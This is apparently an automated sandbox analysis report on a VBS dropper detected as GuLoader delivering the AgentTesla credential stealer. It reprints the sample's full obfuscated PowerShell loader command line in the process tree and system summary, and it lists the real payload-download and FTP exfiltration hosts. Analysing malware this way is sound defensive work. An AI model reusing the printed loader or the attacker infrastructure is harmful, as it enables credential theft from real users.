Windows Analysis Report
SIEM_PO00938467648.vbs

Overview

General Information

Sample Name: SIEM_PO00938467648.vbs
Analysis ID: 756154
MD5: 633811bccf3fe62978ce41a04b653083
SHA1: bc81307b5c229094617e7cb8cdcaec55eaddad36
SHA256: b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608

Detection

AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 7696 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 376 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6160 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe 
VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp 
er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 5484 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
SIEM_PO00938467648.vbs | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth
  • 0xa35:$s1: .CreateObject("WScript.Shell")
  • 0x3e4db:$p1: powershell.exe
  • 0x4b22c:$p1: powershell.exe

Source | Rule | Description | Author | Strings
0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

            Data Obfuscation

            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr 
NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenS
            Snort IDS alerts

            Timestamp: 11/29/22-18:34:46.981738
            Source IP: 192.168.11.20
            Destination IP: 185.31.121.136
            SID: 2029927
            Source Port: 49858
            Destination Port: 21
            Protocol: TCP
            Classtype: A Network Trojan was detected

            Timestamp: 11/29/22-18:34:47.016884
            Source IP: 192.168.11.20
            Destination IP: 185.31.121.136
            SID: 2851779
            Source Port: 49859
            Destination Port: 59772
            Protocol: TCP
            Classtype: A Network Trojan was detected

            AV Detection

            Source: SIEM_PO00938467648.vbs | ReversingLabs: Detection: 34%
            Source: http://pesterbdd.com/images/Pester.png | Avira URL Cloud: Label: malware
            Source: ftp.mcmprint.net | Virustotal: Detection: 9%
            Source: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll | Joe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: unknown | HTTPS traffic detected: 52.20.78.240:443 -> 192.168.11.20:49857 version: TLS 1.2
            Source: Binary string: l8C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.pdb | source: powershell.exe, 00000006.00000002.86750406025.0000000004961000.00000004.00000800.00020000.00000000.sdmp

            Note on the Pester.png hit: the pesterbdd.com, nuget.org, contoso.com and aka.ms strings listed under Networking below come from PowerShell's own bundled modules (Pester, PackageManagement) resident in the powershell.exe process, not from the sample, so the Avira URL Cloud label on that URL is not evidence of sample infrastructure. The sample's own network indicators are qwedft.gq (payload download), ftp.mcmprint.net / 185.31.121.136 (exfiltration) and the api.ipify.org external-IP lookup.

            Networking

            Source: Traffic | Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49858 -> 185.31.121.136:21
            Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49859 -> 185.31.121.136:59772
            Source: unknown | DNS query: name: api.ipify.org (logged three times)
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View | IP Address: 52.20.78.240 (the HTTPS peer for the api.ipify.org lookup, which is why this address also appears with other malware)
            Source: global traffic | HTTP traffic detected:
                GET / HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                Host: api.ipify.org
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET /Akkant/VUUby127.xsn HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: qwedft.gq
                Cache-Control: no-cache
            Source: global traffic | TCP traffic: 192.168.11.20:49859 -> 185.31.121.136:59772
            Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49858, server banner (the sandbox logged each partial read; the complete banner is):
                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                220-You are user number 1 of 50 allowed.
                220-Local time is now 19:34. Server port: 21.
                220-This is a private system - No anonymous login
                220-IPv6 connections are also welcome on this server.
                220 You will be disconnected after 15 minutes of inactivity.
            Source: unknown | Network traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (logged three times)
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: powershell.exe, 00000006.00000003.86113003695.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86808784268.000000001FBA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91145990678.000000001FBE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000006.00000003.86113003695.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86808784268.000000001FBA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91145920354.000000001FBE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kmbImL.com
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: CasPol.exe, 0000000C.00000002.91095102327.0000000001440000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://qwedft.gq/Akkant/VUUby127.xsn
            Source: powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86807185996.000000001C701000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91121875644.000000001D9FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ZK1g7ahAv5q7aIVR.com
            Source: CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ZK1g7ahAv5q7aIVR.comXy
            Source: powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknown | DNS traffic detected: queries for: qwedft.gq
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_1D63A09A recv,

            System Summary

            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr 
